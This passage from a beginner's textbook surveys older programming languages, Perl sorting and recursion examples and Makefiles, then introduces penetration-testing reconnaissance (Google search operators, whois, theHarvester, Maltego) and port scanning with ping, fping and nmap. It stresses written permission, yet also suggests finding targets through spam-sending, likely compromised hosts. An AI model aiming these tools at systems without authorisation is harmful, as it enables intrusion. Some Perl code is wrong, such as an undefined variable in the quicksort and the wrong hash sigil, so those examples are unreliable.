CalculateResult.
DISPLAY UserPrompt
ACCEPT FirstNum
ACCEPT SecondNum
Compute CalcResult = FirstNum + SecondNum
DISPLAY “Result is = “, CalcResult
STOP RUN.
Most of the program is easy to understand, even the parts not previously
explained. A few areas may be difficult to understand. The 01 before the
variable declaration in the DATA DIVISION refers to the level number that
represent data hierarchy. Here the hierarchy is the same. Behind the variable
name we see the storage declaration. PIC stands for picture which shows the
maximum value to hold, here the values between 0 and 9 for the first two
variables and 0 and 99 for the third. The use of the 9 and 99 implicitly means
this variable will store numeric values. For variable UserPrompt the X after
PIC means it will contain alphanumeric values. Alphabetic values are declared
with PIC A. Note the difference between the first two variables and the third.
With VALUE ZEROS we initialize the variable with a 0, with VALUE 0 we
don’t.
Pascal
Of the four big high-level programming languages that were developed in the
late 50 ALGOL was probably the most successful. Its legacy remains with the
many languages that were developed from it. FORTRAN has also influenced
many modern languages, but ALGOL solved many of the problems perceived
to exist with the original version of FORTRAN. ALGOL is now rarely used,
but its immediate successors were Pascal and C. Those two languages in turn
form the basis of most of the popular languages used today such as Java, C++,
C#, Ruby, Perl and of course Python.
Pascal was developed in the late 60’s by noted Swiss computer scientist
Niklaus Wirth. Wirth initially developed several version of ALGOL before
working on Pascal. His hopes for Pascal were to create a language that could
be easily taught to students. It included a lot of structured programming
paradigms such as code blocks, functions as well as for and while loops.
Figure 44. Niklaus Wirth

Pascal is still used today, but the language has become overshadowed by its
successors such as Ruby and Python. Niklaus Wirth went on to develop other
languages such as Oberon and Modula but neither series managed to gain the
same level of popularity that Pascal once had. However Pascal was developed
further with lessons learned from both. These days Pascal is considered one
language too far and is slowly losing ground. The last time I came in contact
with was when I had to update a shipping container system written in 1989 that
used Pascal code.
Program HelloWorld(output);
Begin
Write('Hello, world!')
End.
Haskell
One important subset of programming languages are functional languages.
These developed almost entirely separate from the big four languages and their
successors. Functional language are said to have no side-effects or imperative
programming. The latter means it has no statements and with the former we
mean any kind of function call has no effect on those that call it or the outside
world. Functional languages instead have mathematical functions with no state.
One of the most popular functional languages was Miranda. It was inspired by
many languages that at least had some aspects of a functional language such as
Scheme and ML. Miranda had however one major flaw, it was proprietary. In
the late 80’s many proposals were made to find a replacement. An organized
effort to streamline this process eventually yielded Haskell, named after
famous logician Haskell Curry.
Below you can find a simple Haskell program.
module Main where
main :: IO ()
main = putStrLn "Hello, World!"
If you’re interested in learning more about Haskell, and perhaps prepare for a
serious academic career in Computer Science than I can recommend the book
Learn You a Haskell for Great Good! It is free for download online. If you
want to get the Haskell experience in condensed format check out Derek
Banās’s video on YouTube. Despite the academic interest in Haskell few
practical programs have been written.
Wait! There is more…
Programmer and computer scientist like to experiment. One group of languages
that came to exist are known as esoteric languages. Examples include
Whitespace, MALBOLGE and TRUMPScript. The first Whitespace uses
spaces and tabs as operators and includes a compiler written in the same
language. MALBOLGE was created to be the most difficult language ever
written. It was developed in 1998 by Ben Olmstead. It wasn’t for many years
until the first program was written. This was done using an algorithm using
genetic learning. All the program did was print Hello, World! That program
you can see below.
(=<`#9]~6ZY32Vx/4Rs+0No-&Jk)"Fh}|Bcy?`=*z]Kw%oG4UUS0/@-
ejc(:'8dc
MALBOLGE has continued development and has found a significant niche
interest. Recently it was depicted in an episode of the Sherlock Holmes
inspired TV show Elementary. In the tenth episode of season 1 Sherlock and
Joan need to solve a case wherein MALBOLGE was used to communicate the
code to a secure safe, Leviathan.
Chapter 5 Algorithms with Perl

Learning how to write small computer programs will open a new world. If you
try hard enough small programs will become full applications multiple
megabytes in size. There is no real impediment to increasing application size.
However, if your program has to perform a lot of calculations and if your
customer or boss demands it runs as fast as possible you will need to know
about algorithms. So what are algorithms? To some any program performs a
task and automatically becomes an algorithm. Others consider tasks that can be
explained mathematically to be a true algorithm. They need to be self-
contained and follow operations step-by-step. Computer Scientists have over
several decades discovered the best way to perform actions such as sorting
lists, data processing or artificial learning.
In this chapter I will explain several important algorithms through the use of
Perl, a general purpose language that is also often used as a scripting language
like Python and Shell. Perl was first released in 1987 and was designed by
Larry Wall and gained popularity because of its easy ability to parse texts and
use regular expressions. Perl can at times be difficult to understand. With
simple programs such as text parsers it is not more difficult than C or Python,
but with large programs it becomes much harder to read and as such it has been
referred to as write-only language.
Perl 5 and Perl 6
Despite the power of the Perl language its use has sadly declined. The
proliferation of new languages and the continuing popularity of Python, Java
and C have not done old-school languages such as Perl and Pascal any favors.
What has also done irreparable harm is the divide that was created with the
introduction of Perl 6 in 2000. Perl 5 development has not stopped and so the
language was effectively forked. Despite Perl 6 being specified in 2000
version 1.0 has still to be released! For our examples we will be using Perl 5.
If you are not certain what language version you have installed in Linux just
type in
perl –v
into the command line. Chances are it is Perl 5.
Perl is an interpreted language just like Python. Programs written in Perl have
the extension ‘.pl’. As a first simple example type in the following lines in a
file called HelloWorld.pl
use strict;
use warnings;
print "Hello World!\n";
You can run the program with the command

Perl HelloWorld.pl
If you omit the first two lines the program will still print Hello World! Using
strict and warnings makes for easy debugging. Perl is unusual in its choice of
variables. Just like PHP it is weakly typed. The language does not explicitly
use casting of variables. So a string can be as easily interpreted as an integer
or a float. Unlike Java, which requires the user to convert a String to an int
with the Integer.parseInt() function. Perl has only three types of variables;
scalars ($), arrays (@) and hashes (#). Roughly speaking they correspond to
simple variables, arrays, and dictionaries. Simple variable names start with a
dollar sign $. So to store the string Hello, world! you type in the following:
$sentence = “Hello, world!”;
Input from the Terminal is collected with standard input or STDIN. The
program will stop until a user types something and presses Enter.
$anothersentence = <STDIN>;
print “You typed in $anothersentence”;
Programs can also read multiple lines by changing variable signal $ with @,
an array.
@anothersentence = <STDIN>;
print “You type in the following sentences @anothersentence”;
Now pressing Enter will no longer suffice in closing standard input. Instead,
press Control-D. If you typed in multiple lines you will see each of them as
output. Of course Perl also has conditionals and for loops.
use strict;
use warnings;
print "Enter number\n";

my $num = <STDIN>;
hello($num);
sub hello {
for my $i (0 .. 10) {
if($i > $num) {
print "Number is larger than $num\n";
} else {
print "Number is smaller than $num\n";
}
}
}
Sorting algorithms
Sorting algorithms area amongst the most popular any programmer must know.
Chances are most projects will require a sorting algorithm. With luck you can
find a library to make use of an optimized sorting algorithm. However, this
may not always be available or the data you are working with may be atypical.
In essence a sorting algorithm will sort a list or array of values (integer, float,
string etc.) in a predefined order (size or alphabetical order). For smaller
applications the speed of an algorithm is not relevant. If it takes a less efficient
algorithm 0.2 seconds to sort a list of a thousand bank numbers than there is
little real incentive to implement an efficient algorithm that can do it in 0.1
seconds. But if you have lists of a million records, or there is a lot of data
processing than you should be able to implement the best sorting algorithm
there is. For this tutorial we will start with Bubble sort, the simplest but
usually also the slowest algorithm. However, first we need to define a
benchmark for algorithm speed, also known as the Big O notation. Sorting
algorithms can be defined by an upper bound and a lower bound to the amount
of time it takes to perform their task. Generally speaking it will take an
algorithm n steps to find an element in array if the array is sorted and the
element is located at the nth place. The time it takes is known as linear time, or
O(n). To have a sorting algorithm work at linear time would be the Holy Grail.
At this moment the only time this can occur is if the list or array is already
sorted. In contrast there is also quadratic time or O(n2). This can occur with
very bad algorithms that need to sort a list that is exactly the opposite if sorted.
For example a list with values sorted high to low that needs to be low to high.
With O(n2) if the list or array increases in size the sorting speed will increase
with the power of 2.
Bubble sort
The bubble sort algorithm is easy to understand. If you have an array of 5
integer element that need to be sorted in increasing order of value the algorithm
will start with the first and compare its value with the second. If the second
value is less it will swap them. Then the algorithm will compare the second
and third elements and check again. If the third element has a value less than
the second it will swap them. It will go through this process until the end of the
list or array is reached. The list will not be sorted perfectly after one loop, but
it is an improvement. The list is sorted once the algorithm performs no more
swapping operations. The name of the algorithm comes from the fact that high
values found at the beginning of the list will be swapped all the way to the end
in one loop. Bubble sort is slow, the best case scenario may be O(n) but then
the list is already sorted. Average results are O(n2). Below is a Perl
implementation of bubble sort.
# to use the algorithm we create an array, the keyword ‘my’ makes the @numbers
variable local.
my @numbers = (96, 12, 35, 7, 82, 72, 3, 25, 43, 51);
# we call the function bubble_sort with he array
bubble_sort(@numbers);
# function bubble_sort sorts array
sub bubble_sort {
for my $i (0 .. $#_){ #outer loop
for my $j ($i + 1 .. $#_){ # inner loop
# below we compare variables i and j, then we switch them if the
condition is met
$_[$j] < $_[$i] and @_[$i, $j] = @_[$j, $i];
}
}
}
Quicksort
One of the best sorting algorithms is Quicksort, first theorized by Tony Hoare
in 1959 and implemented in 1961. Hoare is also famous for Hoare logic, a
formal system of rules which can ensure the correctness of a part of a program.
Quicksort is bit more difficult to understand than bubble sort, but I will do my
best. Imagine you have an unordered list of 10 integers like the one shown
below in brackets.
[6,5,1,3,8,4,7,9,2]
Now a random integer is selected. As an example we take the last one, 2. Now
from the left number 6 to the right number 9 we will decide for each element if
it is less or more than 2. We end up with two smaller lists, with integer 2 in the
middle. The smallest list is to the left with just integer 1 and is in order.
[1,2,{6,5,3,8,4,7,9}]
As you may guess, this process is repeated for the larger list. Again we select
a random number such as 6. Then we go through the remainder of the list and
decide which elements are more and which are less than 6. The list will look
like
[1,2,{5,3,4},6,{8,7,9}]
Again both of the sub lists will also be sorted until they are in their correct
order. Quicksort has a worst case speed of O(n2), which may not seem like an
improvement over bubble sort. Yet, its average performance is O(n log n) and
thus decidedly better than bubble sort. Quicksort is probably one of the most
popular sorting algorithms there is. Below you can find an implementation of
Quicksort.
sub quick_sort {
return @_ if @_ < 2; # ends the function if a sublist becomes smaller than 1
my $random = splice @_, int rand @_, 1; # Select a random integer from the
list and remove it with splice
# we use the command grep to find all numbers lower or higher than $random
and call quick_sort again on both lists. This process continuous until return
statement is met
quick_sort(grep $_ < $random, @_), $p, quick_sort(grep $_ >= $random, @_);
}
# create a unordered list of integers

my @quick = (6,5,1,3,8,4,7,9,2);
# call function quick_sort
@quick = quick_sort @quick;
# print the newly ordered list

print "@quick\n";
Recursion
A basic tenant in Computer Science is Recursion. This allows complex
problems to be solved by solving many simpler problems instead. With
recursion we repeatedly call the same method or function with a slightly
simpler version of our problem. The quicksort algorithm used in the previous
section uses recursion and is considered an excellent example of it use. Note
how the unordered list is divided into two around a random number. Then for
both sections the function is yet again called using the each smaller list as the
new input. This is the recursive step. Of course the process cannot go on
forever. We need to set a rule for when we consider a list sorted. The smallest
possible list is one of size 1 and is automatically sorted. This is called the
Base case. This list is then returned with the return statement. Now this list and
the random number are both sorted. If the right most recursive step eventually
gets sorted it will also return back. Now the entire list is sorted.
Another example of a recursive algorithm that calls the same function over and
over until a base case is found is calculating the factorial n! of a number n. An
example would be 5!, which equals 120 (5*4*3*2*1). The Perl implementation
would be as follows
use strict;
use warnings;
# request a number to factorize

print "Enter number\n";
my $num = <STDIN>;
# call the function

my $fac = fact($num,1);
# print the factorized number

print "factorial: $fac\n";
sub fact {
my($num1, $flag) = @_;
if($num1 == 0) { # base case
return $flag;
} else {
fact($num1 - 1, $num1 * $flag);} # recursive step
}
I hope you have enjoyed this brief foray into the world of algorithms and the
use of Perl. Remember, algorithms transcend programming languages. They
form the heart of computer science and are worth devoting time on after you
initial familiarization with programming.
Make
Up until now the example programs in this textbook have been simple. They
have always been small enough to fit into one source code document. On the
other hand we have used libraries a lot. With the C code line such as
#include<stdio.h> must start to feel like second nature. If a C program is
divided into multiple source code files (extension .c) and we want to use this
code in other parts we wrote we need to reference them just like libraries. We
need to create header files (extension .h) for each source code and learn to
reference them. As our program grows bigger and bigger we will eventually
run into a problem. Compiling the code will become very tedious. It is not a
matter of simply using wildcards * to select all the source files in a folder. As
the source code is cross-referenced we need to be careful. To help
programmers Linux comes equipped with the Make command which aids in
compiling code. The examples below are useful for both C and C++ code. All
we need to do is create a makefile which is the topic of this chapter. But first,
let’s learn about those pesky header files.
Header files
You have come across .h header files before without fully understanding what
they mean. Essentially they contain function declarations, variable declarations
and other macro definitions that can be shared between several source code .c
files. Besides the .h files that come with the compiler such as stdio.h you can
also create your own.
An example below show how a C program can use a function defined in
another source file. They are connected with a .h file.
First up is hellomake.c which contains the main function that calls
myPrintHelloMake(). As the function does not exist within the same file the
compiler will search the defines hellomake.h.
#include <hellomake.h>
int main() {
myPrintHelloMake();
return(0);
}
Yet hellomake.h contains only a definition
void myPrintHelloMake(void);
Instead, hellofunc.c contains the implemented function. Despite the fact that
hellomake.h has no reference to hellofunc.c the compiler knows to look in
hellofunc.c because it does have a reference to hellomake.h. The compiler
knows the difference
#include <stdio.h>
#include <hellomake.h>
void myPrintHelloMake(void) {
printf("Hello makefiles!\n");
return;
}
An observant read may think it is more natural for the header file to renamed
hellofunc.h as hellofunc.c implements the function that is prototyped in
hellomake.h. I agree, but it is not required. You can make the changes if you
want to. The program is compiled with the following line
gcc -o hellomake hellomake.c hellofunc.c -I.
You may be tempted to forgo .h files and think you can program everything in
one source file, but you will lose a lot of modularity which will pay dividend
over time.
Makefile
So we have a number of scattered source code files that we compile with a
command that can get more elaborate over time as the project grows.
Preferably you want to keep the compile command handy in a file to reuse over
and over if needed. You can store such a compile command in a makefile. The
advantage of a makefile is that source code can be easily distributed and
compiled by users themselves. The compile operation itself is started by
simply typing in make in the command line. Below is a very simple make
command.
hellomake: hellomake.c hellofunc.c
gcc -o hellomake hellomake.c hellofunc.c -I.
A common misconception about compiling is that all the .h files that are
referenced will see their corresponding .c files also compiled. This is not true.
Note one important issue with the make command. Make sure you place a TAB
before the line gcc –o … and NOT a series of whitespaces!
After you have called make you will find the compiled program hellomake
ready to be called whenever you like. There are a lot of options to use in a
makefile, so let’s delve into them.
CC=gcc
CFLAGS=-I.
DEPS = hellomake.h
%.o: %.c $(DEPS)
$(CC) -c -o $@ $< $(CFLAGS)
hellomake: hellomake.o hellofunc.o
$(CC) -o hellomake hellomake.o hellofunc.o -I.
clean:
rm -f $*.o *~
At first the additions may seem daunting and you may be thinking ‘if the simple
makefile worked…’. For larger projects many of these commands and flags
will come in use. The first two lines are self-explanatory: with CC we state
explicitly the compiler to use and with CFLAGS which additional flags the
compiler should use. In this case we just use –I as before.
The addition of the macro DEPS makes it clear that whenever the hellomake.h
file ic changed we also need to recompile the corresponding .c file. We could
run into hard to find compile problems otherwise. The two lines afterwards
ensure that the source file is indeed recompiled.
The following rule is more interesting. With the following lines we state that
that the two object code files hellomake.o and hellofunc.o are placed in the
dependency list. This ensures that each .c file is compiled before the
executable hellomake is built.
hellomake: hellomake.o hellofunc.o

$(CC) -o hellomake hellomake.o hellofunc.o -I.
The last line adds a new rule to the makefile called clean.
clean:
rm -f $*.o *~
With this rule we simply state that all files with extensions .o and ~ need to be
removed. They all too often clutter directories and are not important for the
executable program or the original source code files.
Part 3: Hacking
Chapter 0 On Hacking + A Warning
What is hacking really?
As you have bought this book it goes without saying that you are not a script
kiddie. Script kiddies are persons, usually between the ages of 12 and 18
(being optimistic about 18) that use ready-made programs in an attempt to gain
access to other systems. Although these days they confine their antics
attempting to hack the Facebook accounts of people they don’t like.
Script kiddies don’t learn much about the underlying tech they use. They don’t
learn about methods, the innards of systems and such. After completing part 1
of this book you know more about Linux than they ever will, and I learned you
a thing or two about Windows as well. This final part of this book is meant to
turn you into a hacker, and I don’t mean somebody who gains access to other
systems. I mean somebody who learns! That is the true meaning of the word
hacker. I will try and teach you by performing penetration testing, the way
security experts perform tests for clients. This means you will not become a
cracker (malicious hacker) either.
With what you learn in this part of the book you are not yet a true pen tester. If
you’re a teenager, and looking for an internship in pen testing than perhaps you
can use the knowledge contained in this book to perform you’re first tests for a
client. You can then learn on the job and become a true pen tester within about
6 months or so.
If you are older: a jobseeker, a manager or a software engineer looking for a
change, then you can use the knowledge of this book to keep up with
discussions on network security. As a manager you can flaunt more than just
rudimentary knowledge and know when junior pen testers are talking nonsense.
Now it’s time to get started!
Figure 45. Kali Linux built-in tools
Using Kali Linux
Ever since the introduction of this book I have suggested to try more than one
flavor of Linux. Ubuntu is a good starting point, but Debian, Mint, ArchLinux
and Fedora are all viable choices. Nonetheless, for hacking purposes Kali
Linux is the go-to distro. It is based on Debian and has nearly all important
pen-testing tools pre-installed. Kali Linux is also wonderful to use on a daily
basis. It has media players and almost everything else you have come to expect
if you’re familiar with Ubuntu. I would install LibreOffice to complete the
system.
root@kali:~# apt-get install libreoffice
You don’t have to use Kali Linux if you don’t want to. You can install every
tool I describe manually, though some are tedious to install and configure
properly. If you already use a Linux OS like Ubuntu or Windows then I advise
the use of virtualization software. Through such software you can run another
OS on top of the one you already use, thus there is no need for dual boot. There
are free versions available to run virtual operating systems: VMware and
VirtualBox are each excellent.
Setting up your Hack Lab
If you have installed Kali Linux as a virtual machine: either in Windows or
Linux, then you have two machines. One can act as a target for you to hack.
Optimally it would be best if you also installed an old version of Windows XP
and Ubuntu. They have known security flaws that you can exploit and can act
as a valuable lesson. Obtaining an older version of Ubuntu is relatively easy,
but Windows XP or Windows 7 may be harder. If you’re a student may be you
are enrolled in a college software distribution scheme, perhaps you have a
DVD with the OS lying around or you just download one using a torrent site.
All in you should have four of five OS when you’re done setting up you’re
hack lab. You can make do with just two: Windows with Kali as a virtual OS,
but neither of these have many easy to hack security flaws. Take your time to
get everything sorted, if you have an old laptop or computer with an old OS
even better.
If you’re going to attempt to hack one if you’re virtual operating systems you
need to remember that it is not worth the risk of remaining connected to your
network. All it takes is one typo and your command to scan the old version of
Windows XP becomes a command to scan a computer somewhere on the
internet. This is not only illegal, but it is possible to trace the scan back to you.
Professional crackers never hack from their own home, nor do they use their
neighbor’s wireless internet connection. They use a directional wireless
adapter and the TOR network to mask their efforts. Whenever people are
arrested for hacking a government organization or company you immediately
know they are idiots.
A Warning!
I have mentioned it before and I will say it once more. Hacking, or maliciously
accessing other systems, computers or service is illegal. In fact, performing
reconnaissance and scanning of other systems is illegal in most parts of the
world. If you perform a penetration test you need explicit permission from the
owner of those systems. This must be in writing! In fact, you need to establish a
contract that states exactly what you are allowed to do. After you have
performed your test you should never share the information with anyone but the
owner. If that person doesn’t fix any of the security holes afterwards, then
tough luck. You have done your part!
Think about what it means if you violate these conditions. With a criminal
record you will never be able to get a job in network security. Many other IT
jobs will also be closed to you. In fact, it would undo everything you have
done since you started reading this book.
You were warned!
So let’s get to it and find out what pen testing is all about!
Chapter 1 Reconnaissance
The first step in performing a penetration test is to get to know your target
system. A target, presumably a company, may have a website through which
they communicate with customers and perform transactions. What follows is a
discussion of a number of tools that can be used to glean public information on
your target.
Using Google
The Google spider crawler scans everything, even security holes. Information
from the crawler is used for the Google search engine. So, you will have to
know how to ask the search engine for the relevant information. Most Google
users just type in keywords into the search bar, but it also accepts filter
commands. What follows is a set of such filter commands that have since their
inception set the security world on fire.
Site:
With site: you can see indexed pages of only your target and not just about the
target. What this means is that all public information about your target that has
not been discerned by the target is left out, so no press releases or other
internet noise.
As an example input the following line into google about your target:
site:targetwebsite.com
We can further limit results by using keywords separated by spaces.
site:targetwebsite.com secretfiles
The latter example will only return pages of the target website that contain the
phrase secretfiles. As you may guess there are plenty of people you leave
private information on their websites.
Intitle:
With intitle: you can search for only those websites with the phrase secretfiles
in their title, useful when attempting to gauge the exposure your target has.
intitle:secretfiles
Inurl:
With inurl: the search is restricted to finding websites with the stated
keywords in their URL.
inurl:admin
This example will search the URL for the word admin and perhaps reveal
configuration files.
Filetype:
With this filter you can search for specific file types on websites. An example
could be
site:www.targetwebsite.com filetype:pdf
Which searches for PDF files at targetwesbite.com. Another common file type
that may contain sensitive information is ppt (PowerPoint). Use filetype:ppt to
find those.
All together Google has become a very powerful reconnaissance tool. In fact,
the book written by Johnny Long and Justin Brown ‘Google Hacking for
Penetration Testers’ is considered vital for any pen tester. However, be
careful with overusing Google. The smart meter at the company have woken up
to the possibility their search engine can be used for reconnaissance.
Using WHOIS
WHOIS is a simple tool built into most versions of Linux. It returns
information about a website, not what is on it. There is also a website
Whois.net that offers similar functionality. In the command line type in the
following string to activate the WHOIS command against your target.
whois targetwebsite.com
Figure 46. Using WHOIS on Google.com

An example of output is a follows. The target website may be fake, but the
information that follows is not!
Domain Name: TARGETWEBSITE.NET
Registrar: ASCIO TECHNOLOGIES, INC. DANMARK - FILIAL AF
ASCIO TECHNOLOGIES, INC. USA
Whois Server: whois.ascio.com
Referral URL: http://www.ascio.com
Name Server: NS01.ONE.COM
Name Server: NS02.ONE.COM
Status: ok
Updated Date: 03-jun-2015
Creation Date: 03-jul-2011
Expiration Date: 03-jul-2016
The first line just returns the official domain name that is registered by the
target, but you would already know that. The second returns the registrar that
has the website name registered, in this case ASCIO. The two lines containing
the words Name Server refer to web servers used by the hosting company to
resolve you IP address with a name address. The last three lines are self-
evident and describe when the site was created, it status was updated and
when it will expire. Going down further in the WHOIS results will reveal
personal details about the registrant and the hosting company.
Using Nslookup
Nslookup (or name server lookup) is a handy tool not dissimilar to WHOIS. It
allows users, network administrators, to query the Domain Name System
(DNS) used to resolve a domain name such as www.targetwebsite.com with an
IP address. The tool has a manual that can be viewed with man nslookup. To
query a website just type in:
nslookup targetwebsite.com
Example output is as follows
Non-authoritative answer:
Name: targetwebsite.net
Address: 123.123.123.1
To use nslookup with just an IP address would get the following result
nslookup 123.123.123.1
Example output would look as follows
Non-authoritative answer:
39.212.30.46.in-addr.arpa name = webcluster39.one.com.
You may notice the non-authoritative answer; this simply means the name-
server queried does not hold the entire zone for the domain.
We can also look at other more exotic records, such as the MX record for
email. If a domain such as targetwebsite.com has only one mail server, then the
MX record would be mail.targetwebsite.com. With more than one record for a
domain the preference number of a MX record is used to indicate where the
email should be sent.
nslookup -querytype=mx bbc.co.uk
In the case of the BBC, there are two mx records
bbc.co.uk mail exchanger = 20 cluster1a.eu.messagelabs.com.

bbc.co.uk mail exchanger = 10 cluster1.eu.messagelabs.com.
theHarvester
theHarvester is a little tool written in Python by Christian Martorella. With it
you can scan the web for email addresses that are related to your target
website. Most businesses at least leave some connection to the outside world
open such as with FTP, SSH, VPN and webmail to do their business. This
leaves them vulnerable to attack from username and password guessing. You
would be surprised by the number of people who use the same username for
every webservice they use (me included). I strongly suggest you use
theHarvester on yourself to discover your own exposure.
To use theHarvester you enter into the terminal the following command
theharvester –d www.targetwebsite.com –l 300 –b all
Here –d is followed by your target domain, -l limits the search with any
specific search engine you use and with –b all you signal to use all search
engines. The search will include Bing, Google, PGP Key server, Exalead and
LinkedIn. Optionally you can include the following behind the command. –f
filename which will store results in a file names filename. Adjust the number
after –l flag to get more results, but the search will take longer.
Figure 47. theharvester targeting a news website
Using Maltego
Maltego is an open source intelligence and forensics tool developed by
Paterva. It uses data mining on information gathered from open sources and
visualizes targets in graphs. For the purpose of this tutorial you will need to
create a free account. Type in maltego in the Terminal and complete your
account details when prompted. After clicking away more prompts you end up
with a blank Maltego canvas as seen in the figure below.
Figure 48. Example of the use of Maltego
In order to use Maltego on a target expand the Palette bar on your left. Drag a
Domain on to the canvas in the middle. You will see a Domain entity has been
created with paterva.com as its domain. Change this to your target domain by
double-clicking the text. To perform ‘transforms’ or queries just right click on
the Domain entity in the canvas and select Run Transforms. You can
immediately select Run All Transforms but if you’re target is a large entity this
action could take a while. Otherwise select To Website [Quick lookup] or To
DNS Name – MX (mail server) to perform a search on the website address or
google mail server respectively. Maltego is a very expansive tool and this
tutorial just scratches the surface, but it should give you a mapping of your
target domain.
Conclusion
These five tools conclude the reconnaissance part of this book. In practice the
number of tool used is countless and all tools described here have numerous
options and flags you can use. Nonetheless, it is counterproductive to get
swamped in information on your target. Use these tools initially in an ad hoc
manner to get an impression of how your target is organized and where they
may be weak. Be sure to document all relevant output. Sometimes I print out
results and go over them with a red pen to mark possible weaknesses. In the
next chapter we will actively scan part of the target system to uncover
vulnerabilities.
EXTRA:
The Net
Figure 49. Using a laptop on a beach circa 1995? ehh, no!

One of the movies that most IT experts will remember is The Net from 1995.
Described as a schlocky, paranoid thriller by director Irvin Winkler it is very
much a product of its time[7]. 1995 was a busy year for the computer industry.
Windows 95 had just been released and with that the modern consumer market
for PC’s was born along with it. No OS before had the kind of exposure that
Windows 95 had[8]. It brought along with it Internet Explorer and Microsoft
Office thus ushering in the rising popularity of Internet. IE famously replaced
Mosaic and the Netscape Navigator as the web browser of choice[9]. And so
along with this wave came two computer/hacking movies. One being Hackers
that dealt mostly with the counter-culture of hacking and the other was The Net.
The latter starred Sandra Bullock as Angela Bennett, a systems analyst who
discovers a backdoor vulnerability in the latest firewall software sold by
Gregg Microsystems that allow the villains unfettered access to pretty much
every system using it. Quickly the hunt is on to kill Bennett; they are aided by
altering her personal digital history thus making her a person of interest for the
police. In effect this movie is as much about identity theft as it is about hacking.
Both The Net and Hackers continued the corporate domination theme started
by Tron back in 1983.
Figure 50. The impossible IP

The Net received mixed reviews. Despite the excellent acting of Sandra
Bullock, the movie appears cheaply made. It also overlooks many technical
and practical issues that the creative staff hoped viewers wouldn’t notice. Well
they did! In the case of the IPv4 protocol you should know that no number of
the dot decimal notation can exceed 255. IPv4 uses four numbers ranging from
0 to 255 for a total of 256. Well, in the world of The Net they use a special
kind of Internet where apparently it is possible. Supposedly this led to a huge
number of cola geysers from viewers who saw the discrepancy. Security also
wasn’t quite the same back then as it is now, if you couldn’t guess someone’s
password there was at least always the override button you could try. Sadly,
this button disappeared on most keyboards.
Figure 51. Ordering a pizza online. Little has changed
Production of the movie may have been rushed it at least does depict the mid
90’s very well. Women in IT were still rather rare but coming on the heels of
greater exposure of women in other lines of work such as the navy and the
military it at least allowed for a woman to play a much stronger role in the
action genre. Sandra Bullock’s acting in The Net opened doors for actresses
such as Angelina Jolie, Catherine Zeta-Jones and Hillary Swank to star in
similar movies. However, back in 1995 it was pretty much impossible to use a
PowerBook Duo laptop on the beach as the screen could not offer the
brightness to outshine the sun much less go anywhere without a power cord[10].
I guess they needed an excuse to put Sandra Bullock into a bikini.
Figure 52. Putting the laptop away

As mentioned before The Net had some good timing. The year before, during
which the movie was already in production the first pizza was sold online by
Pizza Hut at a conference[11]. The method with which Angela Bennett picks her
toppings and places her order does not seem too different from today. The Net
is an interesting movie for if you’re feeling nostalgic about the year 1995, but
do avoid the terrible sequel The Net 2.0 from 2006.
Chapter 2 Scanning
To scan or not to scan
Now that we have completed our reconnaissance of the target we should have
a rough idea of how their system is mapped. We should also have a list of IP
addresses belonging to the system that we can use to further our investigation.
This phase is no longer passive like the previous phase: reconnaissance.
Instead we will be sending data packets over to the target system in the hopes
of deducing what systems they are running. Don’t forget, scanning targets is
officially not allowed even if everybody else does it!
Vulnerable targets
Often those that are new to this field find this phase the most difficult, not
because of the technical details (which are easy) but because they have not
done their homework during the reconnaissance phase and now don't have any
interesting IP addresses. One tip to remedy is to look at spam mail; chances are
they were sent by vulnerable systems. A lot of those systems have been hacked
and are now part of a botnet that are sending spam email to random email
accounts, including yours!
Ports
Computer systems use ports to grant specific services access to make requests
for services. Ports are entirely a digital construct. They are similar to an
address. Unless an incoming message has a correct address (or port number)
the message will be ignored.
Websites hosted computer servers typically leave port 80 open so people can
access them through their browser. The problem is that for hacking purposes
this might complicate matters as it does not leave a direct route of attack. If in
this phase you do not find services open other than port 80 than I suggest you
redo the reconnaissance phase. That said, website hacking is possible but is a
field in its own and discussed in later chapters. Below is a table of commonly
used ports. However, with 65536 ports possible don’t assume a system has
only a few services running. Best way to be certain is to scan all ports.
Port Number Service

20 FTP data transfer
21 FTP control
22 SSH
23 Telnet
25 SMTP
53 DNS
80 HTTP
443 HTTPS
Table 1. Commonly used ports
There are various programs that can be used for scanning, both for port
scanning and vulnerability scanning. We will start with port scanning to see if
the computer at the IP address is running any known services. The first
program is Ping.
Ping
With the Ping command we send ICMP packages to the target computer or
network device. If they are allowed to reply than we know the target is alive,
though a few other details can also be gleaned.
Both Windows and Linux operating systems have the Ping command installed.
On Windows only 4 ICMP packets are sent to the target while in LINUX Ping
continues to send packets until you kill the process with Ctrl + C.
Here is what pinging Google looks like in LINUX.
root@kali:~# ping google.com
PING google.com (74.125.136.113) 56(84) bytes of data.
64 bytes from ea-in-f113.1e100.net (74.125.136.113): icmp_req=1
ttl=48 time=24.4 ms
ttl=48 time=24.3 ms
ttl=48 time=30.7 ms
^C
--- google.com ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4001ms
rtt min/avg/max/mdev = 23.193/25.278/30.734/2.772 ms
We sent 5 packets before we killed Ping. The round trip time for a packet was
about 23-24 ms which means the target server is relatively close. A cross
Atlantic packet can easily add around 150 ms. ttl=48 means that the Time-To-
Live of a packet is 48 routers before the packet is deleted at the next router.
This prevents clogging up the internet.
Figure 53. Pinging Google until Ctrl-C is pressed
Fping
With Fping we can send ICMP packets to a whole range of IP addresses to see
if they are alive. To do this with ping would just take too long and is error
prone.
Here is what a typical Fping command looks like
root@kali:~# fping -a -g IP-address.1 IP-address.255 > livehosts.txt
Now if you check man fping you will see a whole list of possible switches
that you can use as arguments. However, we can keep things simple with Fping
as we are only interested to know what systems are alive. The option -a allows
us to narrow the field down to just IP addresses that are live. With the -g
option we define that we want to use a defined range of IP addresses to check.
With the > pipe command we say that the results should be printed to the file
livehosts.txt. This file will be made if it doesn't already exist. In the example
above with have chosen that the last set of the dot decimal notation will vary
over values 1 through 255. Of course value 0 is also possible.
Now that we have an idea which IP addresses have live ports the next step
will a more thorough examination of the services run on the target system.
Nmap
Nmap has been called the Swiss army knife of port scanning. It is certainly the
most popular tool to determine if your target is alive and what open ports they
have. There are two types of tests you can carry out on your target. The first is
based on TCP-IP which means you will set up a connection with whatever
open port on your target that would accept such a connection. The second is
UDP which is connectionless in that the sender (you) sends packets to the
target without really knowing if they arrived in time. UDP is often overlooked
as it is more popular for real-time services such as Skype and VoIP, but those
can be hacked too.
TCP-IP scan
As stated before TCP-IP tests rely on a connection being established with your
target. Nmap simply tries all 65536 (0-65535) possible ports by sending a
SYN packet. If the target port is alive it will send back a SYN/ACK packet
which is then answered with an ACK packet from your side. This procedure is
known as a three-way handshake and is the beginning of all TCP-IP
